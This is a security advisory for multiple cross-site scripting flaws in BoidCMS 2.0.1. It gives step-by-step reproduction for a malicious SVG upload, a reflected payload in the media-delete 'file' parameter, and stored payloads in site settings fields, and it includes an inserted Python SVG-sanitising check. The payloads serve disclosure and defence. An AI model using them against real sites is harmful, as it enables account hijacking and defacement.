BoidCMS 2.0.1 Cross Site Scripting
Authored by Andrey Stoykov
BoidCMS version 2.0.1 suffers from multiple cross site scripting vulnerabilities. Original discovery of cross site scripting in this version is attributed to Rahad Chowdhury in December of 2023, though this advisory provides additional vectors of attack.
SHA-256: 399c7d150c74e14ff960b4352508c5f4a2a59bf2bfe1f4f390b71685d91640df
# Exploit Title: Multiple XSS Issues in BoidCMS v2.0.1
# Date: 3/2024
# Exploit Author: Andrey Stoykov
# Version: 2.0.1
# Tested on: Ubuntu 22.04
# Blog: http://msecureltd.blogspot.com
XSS via SVG File Upload
Steps to Reproduce:
1. Login with admin user
2. Visit "Media" page
3. Upload xss.svg
4. Click "View" and XSS payload will execute
// xss.svg contents
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(`XSS`);
</script>
</svg>
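As an added defender-side example (not part of the advisory or of BoidCMS's own code), a Python check an upload handler could run to reject SVG files carrying script-capable content before they ever reach the "View" link; the sample inputs are constructed, the first one reproducing the xss.svg above.

```python
import re
import xml.etree.ElementTree as ET

# Elements (by local name, lower-cased) that can execute script or embed HTML.
ACTIVE_ELEMENTS = {"script", "foreignobject"}
# href values that run script when the SVG is rendered inline or opened directly.
SCRIPT_URL = re.compile(r"^\s*(javascript|vbscript)\s*:", re.IGNORECASE)


def local_name(qualified: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tag/attribute names."""
    return qualified.rsplit("}", 1)[-1].lower()


def find_active_content(svg_bytes: bytes) -> list:
    """Return findings describing script-capable content in an uploaded SVG.

    An empty list means no <script>/<foreignObject> element, no on* event
    handler attribute and no javascript: href was found. Malformed XML is a
    finding too, so an upload handler rejects it instead of passing it on.
    """
    try:
        root = ET.fromstring(svg_bytes)  # expat does not fetch the external DTD
    except ET.ParseError as exc:
        return [f"malformed XML: {exc}"]
    findings = []
    for elem in root.iter():
        name = local_name(elem.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in elem.attrib.items():
            aname = local_name(attr)
            if aname.startswith("on"):
                findings.append(f"event handler attribute {aname} on <{name}>")
            elif aname == "href" and SCRIPT_URL.match(value):
                findings.append(f"script URL in href on <{name}>")
    return findings


# Constructed samples: the advisory's xss.svg and a benign icon.
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert(`XSS`);</script>
</svg>"""
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">
<polygon points="0,0 0,50 50,0" fill="#009900"/>
</svg>"""

if __name__ == "__main__":
    for label, data in (("xss.svg", MALICIOUS_SVG), ("icon.svg", BENIGN_SVG)):
        print(label, find_active_content(data) or "clean")
```

Rejecting the file at upload time complements serving user media with a Content-Disposition: attachment header for SVG, which stops the browser from rendering any file that does slip through.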
Reflected XSS:
Steps to Reproduce:
1. Login as admin
2. Visit "Media" page
3. Click "Delete" and intercept the HTTP GET request
4. In "file" parameter add the payload "<script>alert(1)</script>"
5. After forwarding the modified HTTP GET request, a browser popup appears
Stored XSS:
Steps to Reproduce:
1. Login as admin
2. Visit "Settings" page
3. Enter XSS payload in "Title", "Subtitle", "Footer"
4. Then visit the blog page